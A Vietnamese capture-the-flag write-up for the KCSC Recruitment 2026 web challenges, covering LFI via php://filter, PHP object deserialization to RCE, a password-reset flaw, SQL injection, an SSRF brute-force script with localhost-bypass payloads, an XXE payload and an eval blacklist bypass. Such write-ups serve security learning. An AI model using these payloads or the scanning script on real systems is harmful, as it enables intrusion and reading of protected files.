# KCSC Recruitment 2026
## Santa's Shop
Khi vào chall em tạo 1 tài khoản để login vào web
Đăng nhập vào web thì em thấy có 100 coin và 4 phần quà trong đó số coin có thể mua được 3 phần quà và 1 phần quà có giá rất cao nên em đang nghĩ tới khả năng là race conditions
Nhưng sau khi kiểm tra source thì em phát hiện flag luôn

FLAG: `KCSC{m3rry_chr1stm4s_4nd_h4ppy_h4ck1ng}`
## Santa's Shop Revenge
Tương tự như bài trên em kiểm tra source nhưng có vẻ tác giả đã ẩn và không thể xem khi chưa mua được phần quà đó
Nhấn mua thử thì được phản hồi sau

Nhưng khi bấm vào chức năng nạp thì lại bị lỗi nên chỉ còn admin update. Bấm vào chức năng admin dashboard thì hiện ra thông báo coin được cập nhật từ localhost.
Tới đây đọc lại source 1 lần nữa phát hiện ra 1 lỗ hổng ở `file.php`

Sau khi truy cập thử url `/file.php?image=php://filter/convert.base64-encode/resource=admin.php` em được 1 đoạn code đã bị mã hóa.
Mã hóa xong có được mã nguồn của `admin.php`

Ở đây thấy được là để có thể cập nhật coin thì phải truy cập từ localhost và secret phải trùng với secret từ `secret.txt`. Thông qua lỗ hổng LFI ở trên để truy cập vào file `secret.txt`

Khi có được secret tiến hành cập nhật coin

Cập nhật coin xong có thể mua `Mystery Gift Box` lấy flag

FLAG: `KCSC{do_you_have_the_ctrl_u_key_to_get_flags_UwU}`
## Bảy Viên Bi Rồng
Tại file `config.php` hàm `unserialize()` được gọi trực tiếp từ cookie nên có thể chèn 1 chuỗi object đã được serialize vào

Ở `Shenron.php` có method `__destruct()` tự động chạy khi object bị hủy và nếu đáp ứng điều kiện thì sẽ kích hoạt được hàm `grant()` thuộc `Wish.php`

Tại hàm `grant()` khi kiểm soát được `$callback="system"` và `$content=cat /flag.txt` thì có thể lấy được flag

Khai thác:
Intercept điểm danh hằng ngày nhận được 1 đoạn cookie `dragonball`

Decode đoạn mã trên được serialized object của `user`

Thêm object Shenron và gán thêm giá trị cho `$callback`, `$content` và `dragon_ball`=7 để có thể gọi Shenron cho đoạn decode trên để nó biến thành serialized object của `Shenron`

Gửi lại Request với cookie em nhận được flag

FLAG: `KCSC{Sh3nR0n_S4ys_y0Ur_w1sh_f0R_rc3_1s_Gr4Nt3d_M4sT3r!!}`
## Hoshino Portal
Đọc file `resetPassword.js` thấy kiểm tra sự tồn tại của username và email nhưng không kiểm tra email có thuộc về username đó không

=> có thể gửi username: admin và email tồn tại trong hệ thống
Tiếp theo độ mạnh của resetCode dựa vào email

=>sử dụng email không chứa từ khóa 'admin' sẽ sinh ra 1 mã reset yếu có thể brute-force
Khi resetCode xác thực thành công sẽ cập nhật mật khẩu cho username

=> có thể cập nhật mật khẩu cho `username: admin` thay vì `username` của `email`
Khai thác:
Đăng kí 1 tài khoản có `email` không chứa từ khóa 'admin'

Sau đó gửi yêu cầu `resetpassword` và chặn lại do lúc này chưa có `resetCode` và sửa `username: admin` rồi brute-force để tìm `resetCode`

Sau khi đổi thành công mật khẩu đăng nhập và lấy được flag

FLAG: `KCSC{Pr4ct1c3_M4k3s_P3rf3ct!_2a561747db90855b98ddeed0775fe64c}`
## SECURE STORE
Kiểm tra `seed.js` em thấy được ở đây có database chứa code là flag giả tương ứng với discount: 100

Ở `guard.js` sau khi kiểm tra em phát hiện lỗ hổng SQLi nằm ở hàm `checkVoucher`

Ban đầu cách khai thác em nghĩ tới là dùng kiểm tra dò từng kí tự 1 trong flag

Nhưng hàm checkVoucher có cơ chế lọc code.length không quá 18 từ nên cách này đã không dùng được. Sau 1 hồi mày mò thì biết được là tham số gửi dưới dạng mảng trên Node.js sẽ chỉ tính độ dài là 1 nên có thể dùng 1 payload > 18
Nhìn vào database ở `seed.js` em nghĩ nó có 2 cột nhưng khi test thì bị lỗi nên đã nâng lên 3 cột và thành công

Ở response trả về sẽ là cột 3(discount) nên payload em để code ở cột thứ khi trả về ta sẽ được flag

Khi trả về không được flag như mong đợi mà là code của voucher[0]. Sau đó em đã thêm `ORDER BY discount DESC--` để đẩy flag lên đầu

FLAG: `KCSC{32b7d40c7b18a39bd47d249ef1}`
## Simple Web
Vào chall em thử đăng kí tài khoản có user là admin nhưng hiện thông báo lỗi
Khi có hint em tạo lại 1 tài khoản `user: admin`
Sau khi tạo xong đăng nhập bằng `user: admin` thì được chuyển hướng tới trang của admin

Nhìn vào giao diện em nghĩ ở đây có lỗ hổng SSRF
Sau khi mày mò 7749 payload vẫn không được flag em nhờ AI viết được script sau
```
import requests
import urllib3
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = "http://67.223.119.69:5021/admin"
cookie = "session=.eJyrVsosdkzJzcxTsiopKk3VUcrJT0dwSotTi_ISc1OVrJQSwYpqAZ5EENY.aT2LtA.EsI008tEfekIE-qMJUcXG9AvZqI"
HEADERS = {
"Cookie": cookie,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
payloads = [
"http://127.0.0.1:80", "http://127.0.0.1:443", "http://127.0.0.1:22",
"http://0.0.0.0:80", "http://0.0.0.0:443", "http://0.0.0.0:22",
"https://127.0.0.1", "https://localhost",
"http://[::]:80", "http://[::]:25", "http://[::]:22",
"http://127.1", "http://0000::1:80", "http://2130706433",
"http://whitelisted@127.0.0.1", "http://0x7f000001",
"http://017700000001", "http://0177.00.00.01",
"http://⑯⑨。②⑤④。⑯⑨。②⑤④",
"http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80",
"http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80", "http://②⑧⑤②⓪③⑨①⑥⑥:80",
"http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80",
"http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80",
"http://0xd8.0x3a.0xd6.0xe3", "http://0xd83ad6e3",
"http://0xd8.0x3ad6e3", "http://0xd8.0x3a.0xd6e3",
"http://0330.072.0326.0343", "http://000330.0000072.0000326.00000343",
"http://033016553343", "http://3627734755",
"http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37",
"http://216.0x3a.00000000326.0xe3",
"http://localtest.me", "http://newyork.localtest.me",
"http://mysite.localtest.me", "http://redirecttest.localtest.me",
"http://sub1.sub2.sub3.localtest.me",
"http://bugbounty.dod.network", "http://spoofed.burpcollaborator.net",
"http://0x7f.0x0.0x0.0x1", "http://0177.0.0.01"
]
suffixes = ["/flag", "/flag#", "/flag#test", "/flag?"]
print("Đang chạy: ")
for base in payloads:
base = base.rstrip("/")
for suffix in suffixes:
full_payload = base + suffix
try:
response = requests.post(
url,
headers=HEADERS,
data={"url": full_payload},
timeout=3,
verify=False
)
content = response.text
if "KCSC{" in content:
print(f"TÌM THẤY CỜ VỚI: {full_payload}")
start = content.find("KCSC{")
end = content.find("}", start) + 1
flag = content[start:end]
print(f"FLAG: {flag}")
sys.exit()
except Exception:
continue
print("\n[-] Đã thử tất cả payload nhưng KHÔNG tìm thấy cờ.")
```
Sau khi chạy đoạn script trên em thu được flag

FLAG: `KCSC{Y0u_kn0w_uRl_Globbing}`
## Ka Cê Ét Cê
Phân tích:
Tại `JWT.php` có `$secret='REDACTED'`

Trong `Dockerfile` có `ADMIN_PASSWORD='REDACTED'`

=> key để ký JWT là 'REDACTED'
Ở hàm `validateToken` không kết nối tới database để kiểm tra nhật khẩu

=>Có thể tạo `token` của user `admin` mà không cần mật khẩu
Tại `KCSC.php` hàm `update_members()` xử lý dữ liệu XML đầu vào từ người dùng để cập nhật thông tin thành viên

Nhưng trong hàm `loadXML()` có `LIBXML_DTDLOAD` và `LIBXML_NOENT`
`LIBXML_DTDLOAD` cho phép ứng dụng tải và xử lý các DTD từ bên ngoài
`LIBXML_NOENT` yêu cầu parser thay thế các entities bằng giá trị định nghĩa của chúng
=>có thể định nghĩa một external entity trỏ đến một tệp tin trên hệ thống và tham chiếu entity đó trong thẻ <admin>,`LIBXML_NOENT` khiến parser đọc nội dung tệp tin và thay thế vào vị trí tham chiếu
Khai thác:
Tại `Dockerfile` có thể thấy được file flag đã bị đổi tên thành 1 chuỗi ngẫu nhiên vì vậy cần tìm tên file để có thể đọc file flag này

Tạo JWT token với `role: admin` và `secretKey='REDACTED'` để bypass qua hàm `isAdmin()`

Lệnh mv để đổi tên file flag ngay trong câu lệnh khởi chạy CMD nên file `/proc/1/cmdline` sẽ chứa nguyên văn chuỗi: `sh -c mv /flag.txt /flag_....txt ...` vì vậy cần truy cập vào đường dẫn này để có thể đọc được tên file
File `/proc/1/cmdline` chứa câu lệnh khởi chạy process. Tham số trong file được ngăn cách nhau bởi ký tự null byte. Mà XML thường coi null byte là dấu hiệu kết thúc chuỗi hoặc là ký tự không hợp lệ trong văn bản XML
Vì vậy không thể đọc trực tiếp `file:///proc/1/cmdline` mà phải sử dụng PHP Wrapper `php://filter/read=convert.base64-encode`
Em tạo body Json sau
```
{
"xml_content": "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"php://filter/read=convert.base64-encode/resource=/proc/1/cmdline\">]><kcsc><admin>&xxe;</admin></kcsc>"
}
```
Sau khi có cookie và body Json em tiến hành gửi request và nhận được phản hồi là 1 đoạn mã hóa

Decode đoạn mã em được tên file flag

Thay tên file flag vào `/proc/1/cmdline` và gửi lại request em nhận được phản hồi lại là 1 đoạn mã hóa

Sau khi giải mã đoạn mã trên em nhận được flag

FLAG: `KCSC{0hh_w40000_chuc_mun9_b4n_d4_7r0_7h4nh_m07_7h4nh_v13n_cu4_kc5c_nh0000}`
## SECURE SHARE
Phân tích:
Tại file `index.php` biến `$_tpl` được khởi tạo bằng cú pháp HEREDOC cho phép chèn trực tiếp các biến vào chuỗi

Biến `$_SERVER['QUERY_STRING']` được chèn trực tiếp vào `$_tpl` mà không qua xử lý an toàn.

=> cho phép chèn các thẻ template tùy chỉnh vào biến `$_tpl`
Tại `Dockerfile` file `/readflag` được set quyền SUID root và file `/flag.txt` chỉ root mới đọc được

=> Phải thực thi RCE để chạy `/readflag`
Tại hàm `parse_logic_gates` em thấy nó xử lý các thẻ có dạng `{sys:gate(...)}`

Hàm `eval()` em phát hiện lỗ hổng RCE. Nhưng để khai thác cần vượt qua 3 điều kiện trên nó:
* regex không được sử dụng `$`
* whitelist chỉ được sử dụng hàm `date` và `sys_pref_region`
* blacklist chặn các từ khóa như `system`, `exec`, các ký tự `.`,`\` và cú pháp gọi hàm liên tiếp `(\)\s*\()`
Khai thác:
Do `system` đã bị chặn nên em thay thế bằng hàm `sys_pref_region` do nó nằm trong whilelist. Hàm này sẽ trả về giá trị của region do đó em thêm `®ion=system` vào cuối url để được trả về chuỗi `system`
Blacklist đã chặn `(\)\s*\()` em sẽ thay thế nó bằng `/**/`
Sau khi hoàn tất em có được payload sau:
```
{sys:gate((sys_pref_region())/**/('/readflag'))}®ion=system
```
Gửi request em nhận được flag:

FLAG: `KCSC{m0t_lan_nua_ban_da_lam_duoc_g00d_j0bbb!!!}`